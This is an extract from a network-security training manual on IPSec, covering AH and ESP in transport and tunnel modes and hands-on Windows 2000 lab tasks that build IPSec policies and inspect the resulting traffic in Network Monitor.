• The second method is automatic distribution. With automatic distribution, theconcept is that keys are exchanged only when needed. The default IPSecimplementation of automatic key distribution is called Internet KeyExchange (IKE). You can also implement an automated version of the KDC,such as Kerberos implementation.

ModesIPSec has the ability to protect either the complete IP packet or just the upper-layer protocols. The distinction between the two creates two different modes ofimplementation.

• One mode is called Transport Mode. In this implementation, IPSec is pro-tecting upper-layer protocols.

• The other mode is called Tunnel Mode. In this implementation, IPSec pro-tects the entire (tunneled) IP payload.

When Transport Mode is used, the IPSec headers (AH and/or ESP) are insertedbetween the IP header and the TCP header. When Tunnel Mode is used, theIPSec header is inserted between the original IP header (now tunneled) and a newIP header. Tunnel Mode is commonly used to create VPNs between networks.

Along with specifying a mode, the actual decision on the use of AH and/or ESP(or the other way around) is required. Since there are two modes of implementa-tion, and two protocols that can be selected, there are four possible methods ofprotection using IPSec. You can use any of the following:

• ESP in Transport Mode

• ESP in Tunnel Mode

• AH in Transport Mode

• AH in Tunnel Mode

cryptography:The art of scienceconcerning the principles,means, and methods forrendering plaintextunintelligible and forconverting encryptedmessages into intelligibleform.

plaintext:Unencrypted data.

key:A symbol or sequence ofsymbols (or electrical ormechanical correlates ofsymbols) applied to text inorder to encrypt or decrypt.

IPSec Modes and Protocols

Lesson 2: Implementing IPSec 79

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 133: SCNP Hardening

Over and above that, ESP offers message integrity (authentication) and confidenti-ality (encryption). AH offers only message integrity. Tunnel Mode ESP encryptionencrypts all of the tunneled data (that is, tunneled IP header and everythingwithin), while Transport Mode ESP does not—and cannot—encrypt the IP header.Thus the IPSec implementation that offers the maximum protection is ESP inTunnel Mode.

ESP in Transport ModeIn Transport Mode, ESP encrypts and authenticates application data, such asemail, Web pages, and so forth; however, it does not protect the IP addresses. If apacket is captured and analyzed by an attacker, although the data is encrypted,the sender and receiver IP address information is freely available. Both hosts whoare in communication must have IPSec installed and configured to prevent thisfrom occurring.

ESP in Tunnel ModeIn Tunnel Mode, ESP encrypts and authenticates application data, just as inTransport Mode. In this situation, the ultimate source and destination IP addressesare also encrypted because they are encapsulated (tunneled). The reason for thisis that IPSec is implemented on the tunnel endpoints, and not required on thehosts themselves. If this packet is captured and analyzed by an attacker, theattacker will be able to determine only that a packet was sent. None of the con-tents, including the original source and destination, can be found freely. Ofcourse, the external IP headers (that of the tunnel endpoints) can be read.

AH in Transport ModeAH provides authentication of application data. AH does not provide encryptionservices like ESP, only authentication services (as the name indicates). In Trans-port Mode, there is similarity to ESP, though, in that both end users must haveIPSec installed and configured.

AH in Tunnel ModeIn Tunnel Mode, AH authenticates application data from one endpoint to another,often network gateways or firewalls. There is no encryption provided, onlyauthentication. If ESP authentication is turned on, then AH is rarely implementedin Tunnel Mode.

IPSec ImplementationAs you identified in the previous section, there are various modes of implement-ing IPSec. One of the primary questions to answer is: Where are the endpoints inyour network going to be? Are the endpoints the actual hosts? Or, are theendpoints the firewalls?

If true end-to-end security is required between two hosts, then implementingIPSec on each host is the way to go. However, scaling that up to all the hosts inthe network can become difficult to implement and manage.

Imagine that you and your co-workers all pass open notes to each other in yourorganization. In order to prevent a third user from seeing the note sent betweenany two users, you build an infrastructure of opaque PVC pipes between eachcoworker in your organization. If there are a total of five workers, you have to

authenticate:To establish the validity of a

claimed user or object.

firewall:A system or combination of

systems that enforces aboundary between two or

more networks. A gatewaythat limits access between

networks in accordance withlocal security policy. The

typical firewall is aninexpensive micro-based

UNIX box kept clean ofcritical data, with many

modems and public networkports on it, but just one

carefully watched connectionback to the rest of the

cluster.

80 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 134: SCNP Hardening

have an infrastructure of [5 x (5–1)]/2—or 10 pipes. In this office, each personholds four pipes. Now, increase the number of workers to 100. You will need aninfrastructure of [100 x (100–1)]/2—or 4950 pipes, and each person holds 99pipes. Lots of secure links to pass things back and forth through, but not that effi-cient overall.

This is what happens when you implement IPSec in Transport Mode—you basi-cally create many virtual secure pipes between each host and the rest of the hosts.

If host-to-host implementation is chosen, the likely solution will be to use theIPSec function of the OS, such as Windows 2000. If this is the case, IPSec func-tions normally, at the Network layer, performing its function and moving on.

Sometimes though, IPSec may be implemented underneath an existing implemen-tation of the IP protocol stack, between the native IP and the local networkdrivers (see RFC 2401). In such a scenario, this is referred to as a “Bump in theStack” implementation.

Yet another option for IPSec implementation is to use a dedicated piece ofhardware. This equipment would attach to an interface, or a router, and performthe specific encryption functions externally of other components. This is called a“Bump in the Wire” implementation. This offers excellent performance in regardsto the processing of encryption and decryption. It is not suitable for all imple-mentations, however, as adding a physical dedicated piece of equipment to linksmay not be a budgetary option for an organization.

TASK 2A-1Describing the Need for IPSec

1. Why is IPSec becoming a requirement in networks that need securecommunication?

There is no security in the standard IP that is used today. IP can be cap-tured, analyzed, and more with no prevention. IPSec allows for the securityof the actual packets themselves, without relying on Application-levelencryption.

Topic 2BIPSec Policy ManagementImplementing and managing IPSec policies in Windows is accomplished by usingthe Microsoft Management Console. In this topic, you will use the MMC to per-form the many tasks of IPSec implementation.

The MMCMicrosoft introduced the Microsoft Management Console (MMC) in WindowsNT. The MMC is a highly configurable tool used to manage and configure systemand application settings.

Lesson 2: Implementing IPSec 81

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 135: SCNP Hardening

In the first task, you will become familiar with the MMC configuration optionsand create some customized settings. The MMC, as you first use it, will beblank—you select the configuration options. In Figure 2-1, you will see that thereare two places to use a drop-down menu. The first is the overall MMC, calledConsole1 by default. This menu bar has three menus: Console, Window, andHelp. The second menu bar contains the commands from the current option, alsocalled a plug-in. The default plug-in is called Console Root. This has three com-mands: Action, View, and Favorites.

In the default plug-in, Console Root, there are two tabs: Tree and Favorites. TheTree tab shows the items that are available in this plug-in. Items can include fold-ers, Web pages, other snap-ins, and more. The Favorites tab is used to manageshortcuts to items in the Console Tree. This enables you to create a customizedgrouping of tools and shortcuts that you frequently use to manage aspects of yoursystem.

The Tree and Favorites tabs are located in what is called the Left Pane of thesnap-in. This is where the options are expanded, and selected, and possibly addedto Favorites. On the right side of the dividing line is what is called the RightPane. In the Right Pane, you will find the details of any object that is selected inthe Left Pane.

Figure 2-1: The blank MMC console.

TASK 2B-1Examining the MMC

Setup: You are logged on to Windows 2000 Server as Administrator.

1. From the Start menu, choose Run.

2. In the Run box, enter mmc to start the Microsoft Management Console.

3. Choose Console→Add/Remove Snap-In.

4. On the Standalone tab, click Add.

82 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 136: SCNP Hardening

5. Scroll down, select IP Security Policy Management, and click Add.

6. If necessary, select Local Computer, and click Finish.

7. Click Close to close the Add Standalone Snap-in dialog box.

8. Click OK, and leave the MMC open for the next task.

IPSec PoliciesIn Windows 2000, there are predefined IPSec security policies. These policiesallow for implementation of IPSec with minimal effort on the part of theadministrator. As an administrator, you must identify the needs for IPSec in yourenvironment, then enable the proper policy to meet those needs. The three pre-defined policies are:

• Client (Respond Only)—The policy of Client (Respond Only) is used fornormal communication, which is not secured. What this means is that anyWindows 2000 machine (Professional or Server) with this policy enabledwill have the ability to communicate using IPSec if required or requested.Such a machine will not enforce IPSec when initiating communications withany other machine.

• Secure Server (Require Security)—The policy of Secure Server (RequireSecurity) is used when all IP network traffic is secured. What this means isthat any Windows 2000 machine (Professional or Server) with this policyenabled will always enforce secure communications using IPSec. It willnever fall back to unsecured communications.

• Server (Request Security)—The policy of Server (Request Security) is usedwhen IP network traffic is to be secured, and to allow unsecured communica-tion with clients that do not respond to the request. What this means is thatany Windows 2000 machine (Professional or Server) with this policy enabledwill first look to enforce communications using IPSec. If the other machinecannot use IPSec, the first machine will fall back to unsecuredcommunications.

TASK 2B-2Identifying Default IPSec Security Policies

Setup: You are logged on to Windows 2000 Server as Administrator,the MMC is running, and the IP Security Policy Managementsnap-in has been added.

1. In the left pane, select IP Security Policies On Local Machine. Three poli-cies are shown in the right pane.

security policies:The set of laws, rules, andpractices that regulate howan organization manages,protects, and distributessensitive information.

These policies are alsoavailable in Windows XP.

Lesson 2: Implementing IPSec 83

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 137: SCNP Hardening

2. Examine the three policies to see if any are currently assigned.

By default, they are not assigned.

3. Leave the MMC open for the next task.

Saving the Customized MMC ConfigurationSince you have configured the MMC just as you wish, you should save this con-figuration so that it is easy to bring back up. Although you can go through thesteps of adding the snap-in as you did earlier, to do so each time is cumbersome,and is not required.

TASK 2B-3Saving a Customized MMC

Setup: You are logged on to Windows 2000 Server as Administrator,the MMC is running, and the IP Security Policy Managementsnap-in has been added.

1. Choose Console→Exit.

2. When you are asked if you wish to save the console settings, click Yes.

3. Save the file as ipsec.mmc.msc.

4. Verify the new addition by choosing (from the Start menu) Programs→Administrative Tools→ipsec.mmc.msc. Your saved MMC opens just as youhad customized it to do so.

The Secure Server (Require Security) PolicyIn the following sections, you will examine the settings of each of the three pre-defined policies. The most secure policy, Secure Server (Require Security), is thepolicy that states that all communication must be secured, with no exceptions.

The General TabAs the name implies, the General tab provides general information and configura-tion options for the Secure Server (Require Security) policy.

You will be using thisconsole repeatedly

throughout this lesson, soyou might want to create a

shortcut for it on theWindows Desktop.

84 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 138: SCNP Hardening

Figure 2-2 shows the settings for Key Exchange. Keys are used as part of thedifferent forms of encryption that can be implemented in the IPSec policy. IKEstands for Internet Key Exchange, and deals with the method of exchanging thecryptographic key(s). SHA1 and MD5 are both algorithms that are used to verifythe integrity of a message. 3DES and DES are the actual encryption algorithmsthat can be used, and finally, Diffie-Hellman Group will dictate the overallstrength of the encryption.

Figure 2-2: The Key Exchange Security Methods dialog box.

These settings work together to determine the integrity, confidentiality, andstrength of the secured communication.

• Integrity is determined by the SHA1 or MD5 algorithm.

• Confidentiality is determined by the 3DES or DES algorithm.

• Strength is determined by the Diffie-Hellman Group, which can be either96-bit (the low setting) or 128-bit (the high setting) key lengths.

TASK 2B-4Examining Security Methods

Setup: You are logged on to Windows 2000 Server as Administrator,and the ipsec.mmc.msc console is open.

1. In the right pane, right-click Secure Server (Require Security), andchoose Properties.

2. Select the General tab.

3. Observe that the default value for Check For Policy Changes Every is180 minutes. Every 3 hours, the machine (if it is a domain member) willcheck with Windows Active Directory to see if this policy, when assigned,has changed.

These algorithms arediscussed in detail in theprerequisite courses.

DES:(Data Encryption Standard)Definition 1: An unclassifiedcrypto algorithm adopted bythe National Bureau ofStandards for public use.Definition 2: A cryptographicalgorithm for the protectionof unclassified data,published in FederalInformation ProcessingStandard (FIPS) 46. TheDES, which was approved bythe National Institute ofStandards and Technology(NIST), is intended for publicand government use.

Lesson 2: Implementing IPSec 85

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 139: SCNP Hardening

4. Under Key Exchange Using These Settings, click Advanced.

5. In the Key Exchange Settings dialog box, click Methods.

6. Examine the default settings for the security used in Secure Server(Require Security).

7. Close all windows without changing the properties.

The Rules Tab for the Secure Server (Require Security)PolicyThe Rules section of an IPSec policy—in this case, the Secure Server (RequireSecurity) policy—contains the actual security sections of the policy pertaining totraffic and actions. The IP Filter List is used to define the types of network trafficthat are to be affected by this policy. The predefined rules in a policy can bemodified, but cannot be removed. The default rules are for All IP Traffic, AllICMP Traffic, and <Dynamic>.

In addition to the IP Filter List is the Filter Action. In other words, what does thesystem do when a match to the rule is found, such as IP Traffic. There are threeactions, which are listed as:

• Permit: Allow unsecured IP packets to pass.

• Require Security: Requires secured communication.

• Default Response: Follow the negotiations as initiated by the other computer.This is especially useful when no other rule applies. In fact, it is the onlyfilter action for the Client (Respond Only) predefined policy.

86 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 140: SCNP Hardening

Figure 2-3: The default filter lists and filter actions, as shown on the Require Security Rulestab.

In addition to the IP Filter List and the Filter Actions on the Rules tab shown inFigure 2-3, there are other sections that deserve noting. These are the Authentica-tion, Tunnel Setting, and Connection Type options, described in the followingsection and shown in Figure 2-4.

• The Authentication Methods are used to define how a trust will be estab-lished between the two communicating hosts. By default, this is the

Lesson 2: Implementing IPSec 87

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 141: SCNP Hardening

Kerberos method. The other valid options (in addition to Kerberos) are touse a certificate from a Certificate Authority (CA), or to use a predefinedshared key string.

• The Tunnel Setting is used to define if this communication is to use a tunnel,and if so, what the IP address for the end of the tunnel is. The endpoint isthe tunnel computer that is closest to the IP traffic destination.

• The Connection Type is used to define the types of connections to which therule will apply. For example, the default setting is All Network Connections.The second option is to have the rule apply only to Local Area Network(LAN) traffic, and the third option is to have the rule only apply to RemoteAccess traffic.

Figure 2-4: The authentication methods, tunnel settings, and connection types, as shown onthe Require Security Rules tab.

TASK 2B-5Examining Policy Rules

Setup: You are logged on to Windows 2000 Server as Administrator.

1. Reopen the ipsec.mmc.msc console.

2. In the right pane, right-click Secure Server (Require Security), andchoose Properties.

3. If necessary, select the Rules tab.

LAN:(Local Area Network) A

computer communicationssystem limited to no more

than a few miles and usinghigh-speed connections (2 to100 megabits per second). A

short-haul communicationssystem that connects ADP

devices in a building orgroup of buildings within a

few square kilometers,including workstations, front-

end processors, controllers,and servers.

88 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 142: SCNP Hardening

4. Examine the default settings for IP Filter List, Filter Action, Authentica-tion Methods, Tunnel Setting, and Connection Type.

5. Select the All IP Traffic rule, and click the Edit button.

6. Observe the configuration options that can be adjusted in this section.

7. When you are done reviewing the configuration options, click Cancel twice.

8. Close the ipsec.mmc.msc console, without saving changes.

Topic 2CIPSec AH ImplementationYou now have all of the information and tools you need to be able to implementIPSec. Let’s try it out.

About the TasksFor the following tasks, you will work in pairs. The text and activities refer to thetwo machines as Student_P and Student_Q. These machines are connected to theclassroom hub as well as to each other via a crossover cable. You will disable theinterfaces that are connected to the classroom hub and enable the interfaces thatare connected to each other. This way, you can isolate each pair of machines intotheir own little networks and not interfere with other student pairs.

Student_P will initiate communications with Student_Q. Student_Q will dictatewhether it has an IPSec policy enabled. If so, it then determines if it shouldrequest or require Student_P to do the same. On Student_P, at first you will haveno IPSec Respond policy activated, but later you will have a Respond policy. Youwill capture traffic between these two computers using Network Monitor, and per-form an analysis on the traffic.

You will also use the options for configuring policies. You will use just the AHprotocol (authenticity/integrity). Then, you will use just the ESP protocol(confidentiality). Following that, you will use AH with ESP. Also, ESP will beconfigured to use its integrity algorithm. Finally, because the integrity algorithmscan be implemented in two flavors (SHA-1 or MD5) and the encryption algo-rithms for confidentiality can also be implemented in two flavors (DES or 3DES),you’ll use combinations of these.

As a policy maker for a company, you’ll have to make such decisions before youimplement IPSec. These are the actual tools you can use in Windows 2000 toimplement your policies.

Lesson 2: Implementing IPSec 89

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 143: SCNP Hardening

TASK 2C-1Preparing the System Setup and Configuration

Note:Perform this task on all student machines.

1. Open the Network And Dial-up Connections Control Panel.

2. Disable the Classroom Hub interface.

3. Verify that the Partner interface is enabled.

4. Verify your IP addresses. Generally, if the IP address of the interface con-nected to the classroom hub is 172.16.10.x or 172.18.10.x, then the IPaddress of the interface connected via the crossover cable to your partner’smachine will be 172.26.10.x or 172.28.10.x.

5. Verify connectivity by pinging your partner’s IP address. Both studentmachines should be able to ping each other successfully.

6. Close all open windows.

Creating Custom IPSec PoliciesIn the previous topic, you examined the default IPSec policies in Windows 2000.For the remainder of the lesson, you will create and use your own customizedIPSec policies. This will enable you to fully create and secure network trafficbased on your unique configuration requirements. The following figures can beused as a reference while performing the tasks of this section.

If you are unsure about theclassroom configuration,

check with your instructor.

90 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 144: SCNP Hardening

Figure 2-5: Opting not to use the Add Wizard.

When you are creating a new policy, you will need to add and configure all theoptions you previously examined. In these tasks, you will be customizing thepolicies, one by one, and do not want to use the Add Wizard, because the AddWizard will walk you through specific predefined steps. At this stage, you want toperform everything manually.

Lesson 2: Implementing IPSec 91

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 145: SCNP Hardening

Figure 2-6: The Security Methods tab, showing the leftmost part of the Security MethodPreference Order.

During policy creation, you will be presented with the Security Methods tab. Atthis stage, you will see five columns presented: Type, AH Integrity, ESP Confi-dentiality, ESP Integrity, and Key Lifetimes (KB/Sec), but you might need toscroll to see all five.

92 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 146: SCNP Hardening

Figure 2-7: The Security Methods tab, showing the rightmost part of the Security MethodPreference Order.

Security methods are listed in order of preference that this machine will use whenattempting to negotiate IP Security when dealing with another machine thatresponds that it can use IPSec, too. You can add, edit, or remove any of thesemethods. In this case, since you will have named this policy 1_REQUEST_AH(md5)_only, you will simplify the list and offer exactly one choice: Request IPSecurity that relies only on AH Integrity using the MD5 hashing algorithm. Donot worry about key lifetimes at this stage.

TASK 2C-2Creating the 1_REQUEST_AH(md5)_only Policy

Note:Perform this task only if you are designated as Student_Q.

1. Open the ipsec.mmc.msc console.

2. In the right pane, right-click and choose Create IP Security Policy, thenclick Next.

3. For the IP Security Policy Name, enter 1_REQUEST_AH(md5)_only, andclick Next.

4. Uncheck Activate The Default Response Rule, and click Next.

5. Uncheck Edit Properties, and click Finish.

Lesson 2: Implementing IPSec 93

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 147: SCNP Hardening

6. Double-click the new policy 1_REQUEST_AH(md5)_only.

7. On the Rules tab, uncheck Use Add Wizard, and click Add.

8. On the IP Filter List tab, click the radio button for All IP Traffic.

9. Switch to the Filter Action tab.

10. Click the radio button for Request Security (Optional).

11. Click Edit.

12. Verify that the radio button for Negotiate Security is selected.

13. Read the options presented to you under Security Method PreferenceOrder.

14. Remove all but one Security Method by holding down the Shift key,selecting all but one of the choices, and clicking Remove.

15. When prompted with Are You Sure?, click Yes.

16. Select the remaining method, and click Edit.

17. Under Security Method, click the Settings button found under Custom (ForExpert Users)—as you’re on your way to becoming an expert on IPSec.

18. Verify that AH is checked and that the integrity algorithm is MD5.

19. If necessary, uncheck ESP.

20. Under Session Key Settings, uncheck both check boxes.

21. Click OK three times to return to the New Rule Properties dialog box.

22. Leave the New Rule Properties open for the next task.

94 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 148: SCNP Hardening

Editing Authentication Method PoliciesWhen you are creating this customized policy, you are going to use only AH, andnot ESP. So, when you are customizing the settings, be sure to uncheck the ESPoptions and to check the AH options. You should also clear the check boxes forgenerating new keys, both for size (Kbytes) and time (seconds).

Figure 2-8: The Authentication Method tab.

Notice that three authentication methods are supported: Kerberos, Certificates, andPreshared Keys. You will use the third method, as it is simple to implement, fornow. In a production environment, if you have a homogenous Windows 2000domain implementation, you could leave it at the default Kerberos; in a heteroge-neous network, you could choose to set up a CA and distribute IPSec certificates.

TASK 2C-3Editing the 1_REQUEST_AH(md5)_only Policy

Note:Perform this task only if you are designated as Student_Q.

1. Verify that the New Rule Properties are displayed.

2. Select the Authentication Methods tab.

3. Click Edit.

4. Click the radio button for Use This String To Protect The Key Exchange(Preshared Key), and in the box, enter Purple Enigma to provide text forthe preshared key.

Lesson 2: Implementing IPSec 95

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 149: SCNP Hardening

Click OK to close the Edit Authentication Methods Properties dialog box.

5. Switch to the Tunnel Setting tab, but leave the settings alone. You will beworking in Transport Mode only.

6. Switch to the Connection Type tab, but leave the settings alone. You willuse the default of All Network Connections.

7. Click Close to close the Rule Properties. Keep the Policy Properties openfor the next task.

Setting Up the Computer’s ResponseYou have just configured a policy where Student_Q will request any other com-puters that attempt to communicate with it to implement AH by using the MD5algorithm. Let’s assume that this policy is put into effect, and another computersays that it can communicate with Student_Q by using AH, as well. Student_Qshould be in a position to respond to this. Therefore, you should now configurethe Default Response rule in this policy for Student_Q.

Figure 2-9: Preparing to modify the default response.

To modify the rule, you will not use the Add Wizard. Once you click Edit, youwill again be presented with the tabs for Security Methods, Authentication Meth-ods, and Connection Types.

96 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 150: SCNP Hardening

Figure 2-10: Editing Security Methods.

Under Security Methods, you will again see five columns presented: Type, AHIntegrity, ESP Confidentiality, ESP Integrity, and Key Lifetimes (KB/Sec). Asbefore, you can add, edit, or remove any of these methods.

In this case, this policy is named 1_REQUEST_AH(md5)_only, but because it willalso have to respond to the request it made, you’ll simplify the list and offerexactly one choice: Respond to IP Security that relies only on AH integrity usingthe MD5 hashing algorithm. As before, you don’t need to worry about the keylifetimes.

TASK 2C-4Configuring the Policy Response

Note:Perform this task only if you are designated as Student_Q.

1. Verify that the properties for the 1_REQUEST_AH(md5)_only policyare displayed.

2. On the Rules tab, check <Dynamic> Default Response, and click Edit.(The Use Add Wizard check box should remain unchecked.)

3. Remove all but one Security Method by holding down the Shift key,selecting all but one of the choices, and clicking Remove.

4. When prompted with Are You Sure?, click Yes.

Lesson 2: Implementing IPSec 97

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 151: SCNP Hardening

5. Select the remaining method, and click Edit.

6. Under Security Method, click the Settings button found under Custom(For Expert Users).

7. Verify that the box beside AH is checked and that the integrity algo-rithm is MD5.

8. Verify that ESP is unchecked.

9. Under Session Key Settings, verify that the options for generating newkeys for both size and time are unchecked.

10. Click OK twice to return to the Edit Rule Properties.

11. Switch to the Authentication Methods tab.

12. Click Edit.

13. Click the radio button for Use This String To Protect The Key Exchange(Preshared Key), and in the box, enter Purple Enigma to provide the textfor the preshared key.

14. Click OK.

15. Switch to the Connection Type tab, and verify that the setting is thedefault of All Network Connections.

16. Click OK, and then click Close.

17. Close the ipsec.mmc.msc console, without saving changes.

Configuring AH in Both DirectionsYou have configured a policy where Student_Q will request other computers thatattempt to communicate with it to implement AH by using the MD5 algorithm;Student_Q is also in a position to respond by using this algorithm. Now, let’sconfigure Student_P to follow Student_Q’s lead.

TASK 2C-5Configuring the Second Computer

Note:Perform this task only if you are designated as Student_P.

1. Open the ipsec.mmc.msc console. In the right pane, right-click and chooseCreate IP Security Policy. Click Next.

2. For the IP Security Policy Name, enter 1_RESPOND_AH(md5)_only, andclick Next.

3. Uncheck Activate The Default Response Rule, and click Next.

98 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 152: SCNP Hardening

4. Uncheck Edit Properties, and click Finish.

5. Double-click the new policy 1_RESPOND_AH(md5)_only.

6. On the Rules tab, uncheck Use Add Wizard, check <Dynamic> DefaultResponse, and click Edit.

7. Remove all choices but one by holding down the Shift key, selecting allbut one of the choices, and clicking Remove.

8. When prompted with Are You Sure?, click Yes.

9. Select the remaining method, and click Edit.

10. Under Security Method, click the Settings button found under Custom(For Expert Users).

11. Verify that AH is checked and that the integrity algorithm is MD5.

12. Verify that ESP is unchecked.

13. Under Session Key Settings, verify that the boxes for generating new keysfor both time and size are unchecked.

14. Click OK twice to return to the Rule Properties.

15. Switch to the Authentication Methods tab.

16. Click Edit.

17. Click the radio button for Use This String To Protect The Key Exchange(Preshared Key), and in the box, enter Purple Enigma to provide the textfor the preshared key.

18. Click OK.

19. Switch to the Connection Type tab, and verify that the default setting ofAll Network Connections is selected.

20. Click OK, and then click Close to finish the creation of the policy.

21. Close the ipsec.mmc.msc console, without saving changes.

Configuring FTPNow that IPSec policies are configured on two machines, you need to test thepolicies to ensure that they work as you intended them to work. To do this, you’llbring up an FTP site on Student_Q and attempt to access this FTP site fromStudent_P. You’ll do this with IPSec implemented on one machine and then onthe other. You’ll run Network Monitor to capture and record traffic between thetwo machines. You’ll examine these captures and see where (in the packet) theIPSec headers reside. For greater clarity, we can verify this with the RFCs associ-ated with IPSec, as well.

Lesson 2: Implementing IPSec 99

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 153: SCNP Hardening

TASK 2C-6Setting Up the FTP Process

Note:Perform step 1 through step 6 only if you are designated as Student_Q.

1. From the Start menu, choose Programs→Administrative Tools→InternetServices Manager.

2. In the left pane, click your ftp server’s name. Verify that your defaultFTP site is running. Verify its properties, and find out where the homedirectory is physically located. The default home directory is the \inetpub\ftproot folder.

3. Close Internet Services Manager.

4. In Explorer, locate and navigate to the folder designated as the FTPhome directory.

5. In this folder, create a text document. Edit this document to input sometext and save it as text1.txt.

6. Create and save three more similar text documents in the same folder.Use text2.txt, text3.txt, and text4.txt as the file names.

Note: Perform step 7 through step 12 only if you are designated asStudent_P.

7. Open a command prompt.

8. Enter ftp IP_address_of_Student_Q to ftp to Student_Q’s FTP site.

9. Log on as anonymous with no password.

10. Verify that you can access the text documents created on the Student_Qcomputer, by using the DIR command.

11. Once you have verified that you can access the text documents, quit the ftpsession by entering bye at the ftp prompt.

12. Leave this command prompt open.

Implementing the IPSec PolicyYou have just tested a plain text ftp session. The following tasks will walk youthrough the process of implementing IPSec, and testing the results in bothdirections. First, you will prove that you can connect, even though IPSec isimplemented on only one of the hosts.

100 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 154: SCNP Hardening

TASK 2C-7Implementing the 1_REQUEST_AH(md5)_only Policy

Note:Perform step 1 through step 4 only if you are designated as Student_Q.

1. Open your ipsec.mmc.msc console. Right-click the 1_REQUEST_AH(md5)_only policy and choose Assign.

2. Close the ipsec.mmc.msc console. If you are prompted to save changes,click No.

3. Start Network Monitor, and verify that it is going to collect packetsfrom the interface connected to Student_P.

4. Start a new capture, and allow Network Monitor to capture packetsuntil Student_P has completed step 5 through step 9.

Note: Perform step 5 through step 9 only if you are designated as Student_P.

5. At the command prompt, again enter ftp IP_address_of_Student_Q. Youshould be able to successfully ftp to Student_Q after a very brief delay, eventhough an IPSec policy is assigned on Student_Q.

6. Log on as anonymous with no password.

7. Enter dir to see a list of files hosted on the ftp site.

8. Exit the ftp session.

9. Leave the command prompt open.

Request-only Session AnalysisWhy was your attempt successful? What is the reason for the brief delay? This isbecause the policy is designed to request only—not demand—IPSec. If theremote machine trying to communicate with Student_Q is not IPSec-aware ordoes not have a policy assigned to do so, then Student_Q will fall back to regu-lar, insecure IP. The brief delay occurred because Student_Q was trying toestablish an IPSec communication with Student_P.

You will be using NetworkMonitor repeatedlythroughout this course, soyou might want to create ashortcut for it on theWindows Desktop.

Lesson 2: Implementing IPSec 101

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 155: SCNP Hardening

TASK 2C-8Analyzing the Request-only Session

Note:Perform this task only if you are designated as Student_Q.

1. In Network Monitor, stop and view the capture.

2. Observe that, after the ARP resolution has taken place (in frames 1 and2), Student_P attempts to initiate a three-way handshake withStudent_Q (in frame 3). Because the policy on Student_Q says to requestIPSec communication, Student_Q begins the negotiation process (in frame4).

3. In frame 4, observe that the protocol is ISAKMP (UDP port 500). Whenit does not hear from Student_P, it tries again approximately a secondlater. When it does not hear from Student_P again, it falls back to inse-cure communication, and the three-way handshake proceeds as before(in frames 6, 7, and 8). Once the connection is made, the session is estab-lished in clear text, with no IPSec. You are able to see the payload and fullheaders of all the packets, with no evidence of IPSec.

4. Close Network Monitor. You can save your capture to a file, if you like.

Implementing a Request-and-Respond PolicyIn the previous task, you were able to see that even though you had IPSecenabled in one direction, the policy allowed for unsecured communication. WhenStudent_P responded with no IPSec, Student_Q went ahead and accepted the ses-sion, and traffic continued without IPSec. In the next task, you will configureStudent_P to respond to Student_Q’s IPSec policy.

TASK 2C-9Configuring a Request-and-Respond IPSec Session

Note:Perform step 1 only if you are designated as Student_P.

1. Open your ipsec.mmc.msc console. Right-click the 1_RESPOND_AH(md5)_only policy, and choose Assign. Close the ipsec.mmc.mscconsole, without saving changes.

Then, wait until Student_Q performs the next step.

Note: Perform step 2 only if you are designated as Student_Q.

2. Activate Network Monitor, and start a capture.

Note: Perform the rest of this task only if you are designated as Student_P.

For this step, andsubsequent steps that dealwith the ISAKMP protocol,

your classroomconfiguration might not

yield the expected results,due to timing issues as the

students complete theirassigned steps. You can

have them try to restart thecomputer, and then try

redoing the activity.

102 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 156: SCNP Hardening

3. At the command prompt, again enter ftp IP_address_of_Student_Q. Youshould be able to successfully ftp to Student_Q.

4. Log on as anonymous with no password.

5. Enter dir to see a list of files hosted on the ftp site.

6. Exit the ftp session.

7. Close the command prompt.

Request-and-Respond Session AnalysisIn the second attempt at communication, the temporary delay that was visible inthe earlier task was not present. This is due to the fact that the second host wasnow able to respond to the IPSec request initiated by the ftp server. There was noneed to move down the list to a different method of communication, thus savinga bit of time. In the following task, you will use Network Monitor to analyze thissession, and to see how the IPSec policy was implemented.

Some things to look for during this analysis include:

• IP identifies AH with a protocol ID of 0x33 (51).

• AH identifies TCP with a Next Header of 0x6 (6).

• TCP identifies FTP with a destination port of 0x15 (21).

TASK 2C-10Analyzing the Request-and-Respond Session

Note:Perform this task only if you are designated as Student_Q. Student_P isadvised to follow along.

1. In Network Monitor, stop and view the capture.

2. Observe that, after the ARP resolution has taken place (in frames 1 and2), Student_P attempts to initiate a three-way handshake withStudent_Q (in frame 3).

